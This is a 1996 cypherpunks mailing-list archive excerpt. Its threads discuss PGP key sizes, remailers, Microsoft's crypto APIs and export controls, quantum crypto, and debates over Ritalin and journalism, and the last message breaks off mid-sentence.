On  8 Jul 96 at 23:09, David F. Ogren wrote:
[..]
> Despite the above, there are convincing arguments for longer RSA keys.  
> Instead of asking "Why should we have longer keys?", perhaps we should be 
> asking "Why _shouldn't_ we have longer keys?"
 
> In a hybrid cryptosystem such as PGP, very little of the computational 
> process is consumed by RSA encryption.  Only a tiny fraction of the message 
> is RSA encrypted (the session key), and thus the time-critical operation is 
> the symmetric crypto system (IDEA for PGP).
> 
> As an experiment generate a 2047 bit PGP key and a 512 bit PGP key.  
> Encrypt a file (preferably of a reasonable size) using both keys.  
> Depending on the computer you are using, the time difference between the 
> two keys will be a matter of few seconds or even a fraction of a second.

Depends on the computers one uses, and who you are computing with. 
I've heard some horror stories of people using PGP modified to handle 
4kbit or 8kbit keys on 286s that waited <i>days</i> to generate keys 
and hours to sign or decrypt messages.

If you're exchanging messages with people using fast computers, 
lerger key sizes are practical.  Otherwise you need to take the issue 
of key-size/speed tradoff seriously.

> It seems foolish that we use RSA keys that are less secure than our IDEA 
> session keys.  Our RSA keys are much more valuable than our session keys.  
[..]

If very improved factoring methods are discovered, it might not 
matter.  If a new method of cryptanalysis against IDEA comes out, 
that might make RSA key-sizes a non-issue.

AFAIK, PGPlib will support multiple public key and private key 
algorithms.

Rob

 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Wed, 10 Jul 1996 16:03:01 +0800
To: perry@piermont.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <199607092154.RAA24955@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On  9 Jul 96 at 0:19, Perry E. Metzger wrote:
[..]
> Has it occurred to you that many of the children in question are happy
> being medicated, as are many adults? In any case, who are you to tell
> other people what's good for them?

Whether or not the medication works for some (or all) people, whether
or not it ruins or improves their lives, etc. etc, is not really the
issue.

A problem is in giving children medication when they lack the legal 
freedom (and possibly emotional or mental maturity) to make their own 
decisions to take it or not.

Rob
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ecgwulf <ecgwulf@worldnet.att.net>
Date: Wed, 10 Jul 1996 07:28:29 +0800
To: cypherpunks@toad.com
Subject: Re: Style gettting in the way of clear reporting
Message-ID: <199607091740.RAA02157@mailhost.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: tcmay@got.net, cypherpunks@toad.com
Date: Tue Jul 09 10:37:11 1996
In a reply to James A. Donald, Tim May wrote:
> . . . You are probably right that journalism is becoming more florid as 
> "amateurs" flood the market. However, I don't quite buy the
> concentration argument, as things were pretty concentrated in the 
> Hearst era, and the explosion of magazines in the past few decades has 
> not been as concentrated.

I wonder what golden age of journalism these guys have in mind. Journalism 
is garbage and it always has been. After all, it is what connects you with 
your culture. It's a dirty job.

> I still think of "The Wall Street Journal" and "The Economist," two of
> my favorites, as being _careful_ in their reporting (careful is 
> different from unbiased). But my main focus in this thread was on the 
> _styles_, and this I think is more explained by faddishness.

A couple of more fully fascist rags would be hard to find. Misinformation, 
disinformation and total lack of substance -- it's all style. The L.A. 
Times is a close runner-up with its one hundred year history of self 
interest, red-baiting of organized labor and political "enemies" broken 
only by a few periods of acting as a propaganda mill and inspiring a few 
race riots. Take a look at the masthead of, say, a 1943 edition.
> Yes, and many of the newsletters we're seeing--as many are cc:ed or
> forwarded to our list--are the kissing cousins of "zines." Same faux
> style, same emphasis on "flash" over substance.

Does 'faux style' mean 'fucked style'? If so, then kissing is appropriate.

There are multiple issues of relevance:
1. The coding and decoding of messages in apparent plaintext.
2. Assumptions about the authenticity of sources and motives in message 
creation.
3. The separation of form and content in written language which I suggest 
cannot be separated.
4. The apparent political center of gravity of message subscribers. Let's 
say, this mailing list for instance.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: cp850

iQB1AwUBMeKYyj/g5HTtoLA5AQFBNQMA3F/njYiTvcRCkqrLqnD0Tqa3RIQoozYl
LtNc82V+8Wkl1b2dgXFas4SjuNoSeB/hq1UwdgJz97GIOH3VvEMeYayFVHnD1IKi
/W+7lVIJ+62bypryoTP+eQH7hVARztLB
=Gnrt
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Wed, 10 Jul 1996 15:42:07 +0800
To: Mixmaster Mailing List <alt.privacy.anon-server@myriad.alias.net
Subject: MiddleMan comes out of the closet!
Message-ID: <Pine.NEB.3.93.960709180947.183H-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone!

       After a lot of testing, I've come to discover that the middleman
reliability problems are vastly due to the nymserver front-end. With this
in mind, I've decided to drop the nym for middleman and announce it's
actual presence.

       I am middleman and I wrote the patches to mixmaster to make it work
with premail. I want to see the middleman remailer work as a viable
remailer and I feel that having the nym front-end has caused a less than
acceptable remailer in terms of usability.

       With this, I'm announcing the new email address for the middleman
remailer. It is now middleman@jpunix.com. What does this affect? The
middleman remailer can be used as a front-end remailer and you don't have
to question who is running it. The middleman remailer will still NEVER be
the remailer on the end, hence the problems with discovery and persecution
by entities that wish to go after "the remailer on the end" hopefully will
not occur. Of course anyone wishing to run a middleman remailer can still
opt to use a nym, but at the price of a decrease in performance. 

       I will continue to work with Matt Ghio to get the nymserver code to
be more reliable. I admit, it needs a facelift.

       If you have any questions or comments please feel free to email me
at perry@alpha.jpunix.com. Flames go to /dev/null.

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMeLqZFOTpEThrthvAQGsggP9EQfhtEb3/ovlzt2gq/skK8YnqJvagisY
2NMYP6X3mL+AkDArDuEYoXwrFIk6fsg7l2a8kOk8FdxezpChTXczyvo85wvV3WSx
SHEzGJelI8MIil0tT/noIfS/nrLJzVb5nG8r68tNV0lH5hmMqDC73StWL05xlouc
2NUPZURjIG8=
=/0kY
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Wed, 10 Jul 1996 15:56:38 +0800
To: cypherpunks@toad.com
Subject: Edited Edupage, 9 July 1996
Message-ID: <01I6VN5HC4Y8984QJY@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"educom@educom.unc.edu"  9-JUL-1996 18:15:10.81

*****************************************************************
Edupage, 9 July 1996.  Edupage, a summary of news items on information
technology, is provided three times each week as a service by Educom,
a Washington, D.C.-based consortium of leading colleges and universities
seeking to transform education through the use of information technology.
*****************************************************************

>ISLAM AND THE INTERNET
>Seven private Internet providers are now offering their services in Egypt,
>and in Jordan an online service offers a forum where local residents can
>talk to senior government officials;  however, a number of government
>officials, religious conservatives, and intellectuals in those countries do
>not wish to the public to be exposed by the Internet to pornographic
>materials or subjected to an invasion of ideas that could threaten
>political stability and undermine Islamic culture.  "If you have certain
>values you don't want them to be neglected," says the secretary-general of
>Egypt's Labor Party.  "Our society is Islamic, and we have our own values,
>which may not be the same as the West."  (Christian Science Monitor 9 Jul
>96)  The  Monitor's new web site is at  < http://www.csmonitor.com >.

	Like China, various other countries are trying to get the Internet's
benefits (such as technical information) without its other consequences
(extension of civil liberties into countries that want to deny them). One idea
that I've had for preventing such problems is to look for addresses from such
countries that are posting to technical newsgroups, to technical mailing lists,
or that are attempting to get access to web pages on technical subjects (which
access they will hopefully be denied, although an alternate possibility). Then
mail information to those addresses that those countries don't want getting
into their countries, such as on human rights abuses (or well-written
pornography...). One interesting (and somewhat cypherpunk) matter in this is
making sure that the email in question can't be blocked by simple means such
as who it appears to be from; faked email addresses, which wouldn't need to be
unbreakable in this country - a definite advantage - would be necessary. One
difficulty is that they might start searching on keywords for text.
	An extension of this for web sites, which I understand as possible
but difficult, would be to swap anyone from such a country trying to get access
to a technical web site to instead receive "subversive" information or
pictures. (The pornography mentioned above would probably be more effective in
picture format; other pictures might include information on human rights
abuses).
	One attractive matter on the above is that it can be pretty easily done
by individuals. TCMay, for instance, might want to set up a bot that would mail
people in Sudan information on female castration/"circumcision".
	-Allen

>Edupage is written by John Gehl <gehl@educom.edu> & Suzanne Douglas
><douglas@educom.edu>.  Voice:  404-371-1853, Fax: 404-371-8057.  

>***************************************************************
>Edupage ... is what you've just finished reading.  To subscribe to Edupage:
>send mail to: listproc@educom.unc.edu with the message:  subscribe edupage
>Gabriel Daniel Fahrenheit (if your name is Gabriel Daniel Fahrenheit; 
>otherwise, substitute your own name).  ...  To cancel, send a message to:
>listproc@educom.unc.edu with the message: unsubscribe edupage.   (If you
>have subscription problems, send mail to manager@educom.unc.edu.)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "John A. Perry" <perry@alpha.jpunix.com>
Date: Wed, 10 Jul 1996 14:16:02 +0800
To: Mixmaster Mailing List <alt.privacy.anon-server@alpha.jpunix.com
Subject: New type2.list/pubring.mix
Message-ID: <Pine.NEB.3.93.960709182704.183I-100000@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


Hello again Everyone!

       I have just updated the type2.list/pubring.mix combination on
jpunix.com to reflect middleman coming out of the closet. as well as the
new key for mixmaster@alpha.c2.org. The files are available by FTP from
ftp.jpunix.com and by WWW from www.jpunix.com not to mention they are
available via premail-0.44!

 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mike@fionn.lbl.gov (Michael Helm)
Date: Wed, 10 Jul 1996 14:27:34 +0800
To: mpd@netcom.com (Mike Duvos)
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <199607100140.SAA15188@fionn.lbl.gov>
MIME-Version: 1.0
Content-Type: text/plain


On Jul 9, 12:02pm, Mike Duvos wrote:
> If we have safe and effective medications which increase
> alertness in the school and in the workplace, why shouldn't
> everyone be able to take them in small doses as the need arises?

So?  I hate to be flip, but is there a coffee shortage in your area?

Stimulants don't have the same effect on everybody.  "Normal" people
who take stimulants tend to act a lot like untreated hyperactives:
jittery, unfocussed, irritable.  Your point about long term use
is well taken, many people find the positive effects wear down after
a while.  Sometimes this is alrite, because in the meantime they
have been able to learn coping strategies they were unable to learn
before.  Sometimes it is not alrite, because their problems are too
severe, & they need other treatment.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rochberg <rochberg@GS84.SP.CS.CMU.EDU>
Date: Wed, 10 Jul 1996 14:24:24 +0800
To: cypherpunks@toad.com
Subject: Re: Put Uncle Sam in your Calling Circle
In-Reply-To: <+cmu.andrew.internet.cypherpunks+klsfp0q00UfAI10Oxk@andrew.cmu.edu>
Message-ID: <vnzwx0dniw6.fsf@GS84.SP.CS.CMU.EDU>
MIME-Version: 1.0
Content-Type: text/plain


"Mark O. Aldrich" <maldrich@grci.com> writes:
[Tom Tomorrow RSA posters]
> 
> THE QUESTION THAT (therefore) BEGS TO BE ASKED:
> 
> How can all the rest of us get copies, or are you just rubbing our
> collective noses in the "I got one and you don't" dirt?  :)
> 

You can find EPS and GIF versions at
http://www.rsa.com/rsa/gallery/gallery.htm  

						-david




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Wed, 10 Jul 1996 12:34:22 +0800
To: dcsb@ai.mit.edu
Subject: July Freedom Forum Meeting
Message-ID: <v03007601ae0895a2858e@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain



--- begin forwarded text


Date: Tue, 09 Jul 1996 17:48:35 -0500
From: Jack Shimek <jshimek@jaqboot.mv.com>
MIME-Version: 1.0
To: <very big snip...>
Subject: July Freedom Forum Meeting

********   FREEDOM FORUM   *******
July Meeting Announcement
**********************************

July 15, 1996,  7-9 PM,  Newbridge Cafe, Nashua, New Hampshire

E$  ----  Electronic Money and Commerce

Robert Hettinga, Digital Commerce Society of Boston

---------------------------------------

Banks have been doing "electronic funds transfers" for years, and now 
ATM transactions have skyrocketed, due to their convenience.  What 
happens when you can take complete control by saving your e-money right 
in your own personal computer's hard drive?  Will there be competing 
e-currencies?  Will transactions become invisible?  The internet and new 
encryption techniques make the possibilities absolutely enthralling.

Hear Bob Hettinga explore all the technologies and possibilities at the 
July Freedom Forum!

(For directions, see our web page at:
http://www.mv.com/ipusers/jaqboot/Freedom/Forum.html

apologies to this month's speaker for not creating a full web page on 
his talk.  Will catch up after the talk.

Jack Shimek

--- end forwarded text



-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "George Kuzmowycz" <gkuzmo@ix.netcom.com>
Date: Wed, 10 Jul 1996 13:12:09 +0800
To: cypherpunks@toad.com
Subject: MSoft crypto API's
Message-ID: <199607092319.QAA00934@dfw-ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


  The June 10, 1996 Network World carried a story on page 8 under the 
title "Microsoft breaks crypto barrier", which starts off as follows:

  " Microsoft Corp. last week said it will include cryptography-based 
security technology in its operating systems, messaging product and 
Web browser through a new set of APIs that will be available both in 
the U.S. and overseas.

 " The fact that the National Security Agency is allowing Microsoft 
to export the cryptographic APIs is somewhat of a coup for the 
software vendor, although the NSA did nothing to alter the current 
export ban on strong encryption."

  Later on, it says:

"  Microsoft's Crypto APIs will be available to third-party vendors
writing applications with embedded security. But the hardware or
software Crypto-engines for these applications will need to be
digitally signed by Microsoft before they will work with the APIs.
Under an unusual arrangement with the NSA, Microsoft will act as a
front man for the powerful U.S. spy agency, checking on whether the
vendors' products comply with U.S. export rules."

  I was a bit surprised not to see any discussion of this here. Is it 
just old news? Or maybe people here don't read Network World?

  I didn't paste in the whole article for copyright reasons. Since 
they seem to be on a one-month lag with posting back articles on 
their Web site, it just this week became available at 
www.nwfusion.com. 

  An MS/NSA alliance?

        -gk-




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Blake Wehlage <jwilk@iglou.com>
Date: Wed, 10 Jul 1996 13:09:48 +0800
To: cypherpunks@toad.com
Subject: PGP ICON
Message-ID: <m0udmWm-00039DC@mail.iglou.com>
MIME-Version: 1.0
Content-Type: text/plain



Does anyone no where I can get a PGP icon for my web page??

Tanks a mil!
---





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: blanc <blancw@accessone.com>
Date: Wed, 10 Jul 1996 14:52:45 +0800
To: "'cypherpunks@toad.com>
Subject: FW: [RANT] Giving Mind Control Drugs to Children
Message-ID: <01BB6DD2.7F742B20@blancw.accessone.com>
MIME-Version: 1.0
Content-Type: text/plain


[for some reason this went out without my comments earlier]

From:  Mike Duvos

Of course, no amount of reason will disuade the True Believers from
embracing yet another disease model, and we shouldn't expect that it 
would.  But I think it is clear to many people that the forced medication
of children for the convenience of those who take care of them is
getting a bit out of control. 
........................................................................



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Derek Bell <dbell@maths.tcd.ie>
Date: Wed, 10 Jul 1996 09:17:47 +0800
To: CypherPunks <perry@piermont.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
In-Reply-To: <199607081653.MAA10428@jekyll.piermont.com>
Message-ID: <9607092013.aa28178@salmon.maths.tcd.ie>
MIME-Version: 1.0
Content-Type: text/plain


In message <199607081653.MAA10428@jekyll.piermont.com>, "Perry E. Metzger" writ
es:
>Oh, and by the way, Ritalin has never been known in slang as "mother's
>little helper". That would be a tranquilizer taken by the mother to
>help her get through her own day.

	I think this refers to Valium.

ObCrypto:

	I see some Australian researchers have made an advance in quantum
crypto.

	Derek




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 10 Jul 1996 13:17:19 +0800
To: CypherPunks <dbell@maths.tcd.ie>
Subject: Advances in Quantum crypto
In-Reply-To: <9607092013.aa28178@salmon.maths.tcd.ie>
Message-ID: <Pine.LNX.3.94.960709202633.833A-100000@gak>
MIME-Version: 1.0
Content-Type: multipart/signed; boundary="Boundary..3943.1071713592.multipart/signed"

--Boundary..3943.1071713592.multipart/signed
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

On Tue, 9 Jul 1996, Derek Bell wrote:

> ObCrypto:
> 
> 	I see some Australian researchers have made an advance in quantum
> crypto.

What kinds of advances?  Last I heard, British Telecom was using quantum
crypto on 10 kilometer fiber optic cables.

-- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_



--Boundary..3943.1071713592.multipart/signed
Content-Type: application/octet-stream; name="pgp00001.pgp"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="pgp00001.pgp"
Content-Description: "PGP signature"

LS0tLS1CRUdJTiBQR1AgU0lHTkFUVVJFLS0tLS0KVmVyc2lvbjogMi42LjMK
CmlRQ1ZBd1VCTWVMNXFiWmMrc3Y1c2l1bEFRRVRoQVArT1ZYclhUNHdEOUFl
aFp3L0ZUYlFNdmtHWXBudytDdlEKZ1ZTWXZxQWhaaGNkdHNuY1M1dkdtMnds
ZjJmTHI0aC9wSnlYNHlSNGh3anJnUkQ5dDlpRFRRdmxROGFkOFNMdgpaOEFR
Q251YTBTQi8vSXd4eFd2UWVZdUlhSkh2QS9BbVlwOCt1cGxuY3A1ZFY5cWtp
Y2pCZnU1bzZ6U1VYMm10ClJ6YzRnbStubm53PQo9c01WKwotLS0tLUVORCBQ
R1AgU0lHTkFUVVJFLS0tLS0K
--Boundary..3943.1071713592.multipart/signed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 10 Jul 1996 15:37:38 +0800
To: "George Kuzmowycz" <cypherpunks@toad.com
Subject: Re: MSoft crypto API's
Message-ID: <199607100335.UAA01215@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:19 PM 7/9/96 -0400, George Kuzmowycz wrote:
>  The June 10, 1996 Network World carried a story on page 8 under the 
>title "Microsoft breaks crypto barrier", which starts off as follows:
>
>  " Microsoft Corp. last week said it will include cryptography-based 
>security technology in its operating systems, messaging product and 
>Web browser through a new set of APIs that will be available both in 
>the U.S. and overseas.
>
> " The fact that the National Security Agency is allowing Microsoft 
>to export the cryptographic APIs is somewhat of a coup for the 
>software vendor, although the NSA did nothing to alter the current 
>export ban on strong encryption."
>
>  Later on, it says:
>
>"  Microsoft's Crypto APIs will be available to third-party vendors
>writing applications with embedded security. But the hardware or
>software Crypto-engines for these applications will need to be
>digitally signed by Microsoft before they will work with the APIs.
>Under an unusual arrangement with the NSA, Microsoft will act as a
>front man for the powerful U.S. spy agency, checking on whether the
>vendors' products comply with U.S. export rules."

Unexplained:   What if the program Microsoft is asked to sign is not 
intended for export?  Presumably, NSA has no authority, then, and thus 
presumably Microsoft shouldn't be able to refuse to sign anything they're 
asked.

Question:  Doesn't this set up an action by Microsoft which would be 
actionable under anti-trust laws (if it wasn't done at the behest of 
government?)


Couldn't somebody IMPORT a piece of encryption software, have it signed by 
Microsoft, then take the XOR of the signed and unsigned software and export 
it?  (It's not a tool capable of encryption...)

Or:  Microsoft presumably has foreign branches, or at least it could easily 
afford to set up one.  What's to stop Microsoft from signing foreign 
encryption software outside of the US?  The software is never exported 
(since it's already outside the country...), so there's no USA-law involv
ement.
Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Wed, 10 Jul 1996 15:23:13 +0800
To: cypherpunks@toad.com
Subject: Re: A case for 2560 bit keys
In-Reply-To: <199607092058.NAA05528@mail.pacifier.com>
Message-ID: <Pine.LNX.3.94.960709203427.833B-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 9 Jul 1996, jim bell wrote:

> I don't think it's going to make a great deal of difference.  We've "all" 
> shifted to 1024-bit keys, even though it's unlikely anybody will have the 
> resources to crack them for decades if not centuries.  And the moment any 
> government prosecutes anyone with information obtained by a decrypt of a 
> 1024-bit key, the (then) stragglers will join the rest of us at 1500 or 
> 2000+.  The government knows this and there's nothing it can do about it, 
> except possibly for GAK and it isn't making much headway in that.

Wiretaps aren't always used as evidence.  It's a very effective way to snoop
on people under suspect and get some information on where some incriminating
information may be, but they rarely produce hard evidence.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
"Freedom is the freedom to say that two plus two make four.  If that
is granted, all else follows."  --George Orwell, _1984_


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMeL7lrZc+sv5siulAQGAeQP9GWDx/lapMeBCUW+0+P24uf/Il5eJUg+S
4RSZb8owZvWJ0queF+ygfFjSI8DV+HJNFryOJ87vNRmINvTCTuepNJzod1QG8+tk
B2NMJ59rO7AFGWhikqlLLA4QOc5qX5Uvti/Rwu8BmqS/TAt3RFjqciRiDakJA2Pa
SCVhOh3GnwQ=
=mVY8
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Wed, 10 Jul 1996 14:36:38 +0800
To: cypherpunks@toad.com
Subject: ADD and Unix, + Ritalin Questions
Message-ID: <199607100204.VAA15489@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



1. Unix aggravates the Attention Deficit Syndrome. 

Do you agree?

2. USENET aggravates the Attention Deficit Syndrome. 

Do you agree?

Also

3. Are there any long term effects from Ritalin, and can it
be discontinued easily?

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: gdunn@sciborg.uwaterloo.ca (Graham Dunn)
Date: Tue, 9 Jul 1996 23:53:58 +0800
To: William Knowles <erehwon@c2.org>
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <9607091205.AA12696@mailserv.kirin.co.jp>
MIME-Version: 1.0
Content-Type: text/plain


At  2:32 96.7.9 -0700, William Knowles wrote:

>Below is a list of famous people with Attention Deficit Disorders 
>and/or Learning Disorders, and I'd be willing to bet that Perry Metzger
>either has, or knows someone with ADD. 
> 
>Albert Einstein, Galileo, Mozart, Wright Brothers, Leonardo da Vinci,
>Bruce Jenner, Tom Cruise, Charles Schwab, Henry Winkler, Danny Glover,
>Walt Disney, John Lennon, Winston Churchill, Henry Ford, 
>Stephen Hawkings, Jules Verne, Alexander Graham Bell, Woodrow Wilson, 
>Hans Christian Anderson,Beavis, Nelson Rockefeller, Thomas Edison, 
>Gen. George Patton, Agatha Christie, John F. Kennedy, Whoopi Goldberg, 
>Rodin, Thomas Thoreau, David H. Murdock, Dustin Hoffman, Pete Rose, 
>Russell White, Jason Kidd, Russell Varian, Robin Williams, Louis Pasteur, 
>Werner von Braun, Dwight D. Eisenhower, Robert Kennedy, alberto Tnmba
>Prince Charles, Gen. Westmoreland, Eddie Rickenbacker, Gregory Boyington, 
>Harry Belafonte, F. Scott Fitzgerald, Steve McQueen, George C. Scott, 
>Tom Smothers, Lindsay Wagner, George Bernard Shaw, Beethoven, Carl Lewis, 
>Jackie Stewart, "Magic" Johnson, Weyerhauser family, Wrigley, John Corcoran.
> 
>One can only wonder how much more great some of the people on this list would 
>be today if they knew ADD back then. 
> 
> 
>William Knowles
>erehwon@c2.org

OTOH, one could argue that their lack of attention to daily matters was
what allowed them to be 'great' in the first place. Picture a Mozart on
Ritalin.

Boss - "Hey, Wolfgang, thanks for getting that presentation together so
quick, it really impressed our client. And that was a really snappy jingle
you wrote for the opening slide show, too ..."

So, he's a 'great' worker at the office, and undoubtably undergoes nowhere
near the mental stress he would off Ritalin. But I cannot, for the life of
me, imagine _this_ man writing the music that the non-medicated Mozart did.

So should the medication you take be decided by the area in which you want
to be successful ? (or even better, vice versa: Personality engineering,
here we come).

Regards,
Graham Dunn

---
No PGP signature. Who would _want_ to impersonate me ?



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "geeman@best.com" <geeman@best.com>
Date: Wed, 10 Jul 1996 16:13:57 +0800
To: "'cypherpunks@toad.com>
Subject: FW: MSoft crypto API's
Message-ID: <01BB6DDF.0FFA0A00@geeman.vip.best.com>
MIME-Version: 1.0
Content-Type: text/plain




----------
From: 	George Kuzmowycz[SMTP:gkuzmo@ix.netcom.com]
Sent: 	Tuesday, July 09, 1996 4:19 PM
To: 	cypherpunks@toad.com
Subject: 	MSoft crypto API's


......

  The June 10, 1996 Network World carried a story on page 8 under the
title "Microsoft breaks crypto barrier", which starts off as follows:

  " Microsoft Corp. last week said it will include cryptography-based
security technology in its operating systems, messaging product and
Web browser through a new set of APIs that will be available both in
the U.S. and overseas.

They said this quite some time ago!

  Later on, it says:

"  Microsoft's Crypto APIs will be available to third-party vendors
writing applications with embedded security. But the hardware or
software Crypto-engines for these applications will need to be
digitally signed by Microsoft before they will work with the APIs.
Under an unusual arrangement with the NSA, Microsoft will act as a
front man for the powerful U.S. spy agency, checking on whether the
vendors' products comply with U.S. export rules."

> They got it wrong, no big surprise.  MSFT explicitly says export 
compliance is the developer's responsibility, and any notion that MSFT is 
going to front for NSA in somehow validating crypto code is ludicrous.  The 
signature function is so the OS can validate the code and make sure it's 
not been tampered with.  Period.  Excuse me, er, NW, how is MSFT going to 
sign hardware?  heheheheh.

  I was a bit surprised not to see any discussion of this here. Is it
just old news? Or maybe people here don't read Network World?

> Both.

  An MS/NSA alliance?

> Perhaps, but this ain't it.







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: JR@ns.cnb.uam.es
Date: Wed, 10 Jul 1996 09:31:26 +0800
To: cypherpunks@toad.com
Subject: Re: [RANT] Giving Mind Control Drugs to Children
Message-ID: <960709215703.21003a36@ROCK.CNB.UAM.ES>
MIME-Version: 1.0
Content-Type: text/plain


>I bet you go up to people in near suicidal states and tell them "hey,
>get a life", don't you.
>
	Sorry, Perry, but that's a cultural matter. Here we consider one
has right over his/her own life up to decide to suicide. And so it is not
ilegal here.

	What that reflects is that I respect their right to dispose of their
lifes. I do care though, and if I can help I'll do my best. That's why I
studied Medicine in the first place. 

	Just as I try to convince people to learn, increase their political
awareness, overcome their limitations and get better. That's why I defend
defensive use of crypto against technological mind-control. I still won't
force anyone into using this or that algorithm or taking this or that
drug.

	As long as they have a free will. Then comes disease, when one is
not able to decide by him/herself. If I were to make a blood transfusion
to someone refusing it on religious grounds I wouldn't be much different
from the gov't imposing some crypto scheme on the basis of its own moral
grounds. Is it that what you are proposing?

	It would be quiet another thing if I saved the life of someone
who can't tell me at all his/her religious beliefs. Not to say I wouldn't
'cos I'd. But I don't think goverments can say we are not able to express
our preferences, do they?

	In short, I may think otherwise and try to convince people not to
suicide, even do my best. But in the end it's their choice. Just the same
I believe the gov't can try to convince us, but it should be in the end
our choice to chose how we live (or what crypto we use).

	So, are you saying that to avoide the society collapsing by
terrorism and go to its suicide we should give the government total
control?

				jr




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bart  Croughs <bart.croughs@tip.nl>
Date: Wed, 10 Jul 1996 11:24:11 +0800
To: "'cypherpunks@toad.com>
Subject: DS: The Net and Terrorism
Message-ID: <01BB6DE1.F2CE5BE0@groningen06.pop.tip.nl>
MIME-Version: 1.0
Content-Type: text/plain




On monday 8 july 1996, Mark Rogaski wrote:

An entity claiming to be Timothy C. May wrote:
: 
: (Note: For various cultural and image reasons, science and technology are
: _not_ emphasized as careers for black children. Contrast the image of
: science in predominantly black environments with the image of science in,
: say, predominantly Jewish environments. The result is clear: blacks are
: severely underrepresented in these areas, and Jews are overrepresented in
: these same areas. Hey, I'm just citing a basic truth of our times, at least
: in this country. Similar statistics apply to Asians, with more than half of
: all U.C. Berkeley science and engineering undergrad students being Asian,
: and something less than 3% of them being black. The figures for who
: _graduates_ are even more skewed. There are various reasons for this. One
: of my pet peeves is how the terms "dweeb," "nerd," and "geek" are used to
: characterize science and engineering majors and professionals. Hardly terms
: that are likely to make a brother in the hood consider studying science!)
: 

I attended a school in the Pittsburgh area that had an active recruiting
effort centered in Philadelphia.  Thus, most of the black students were
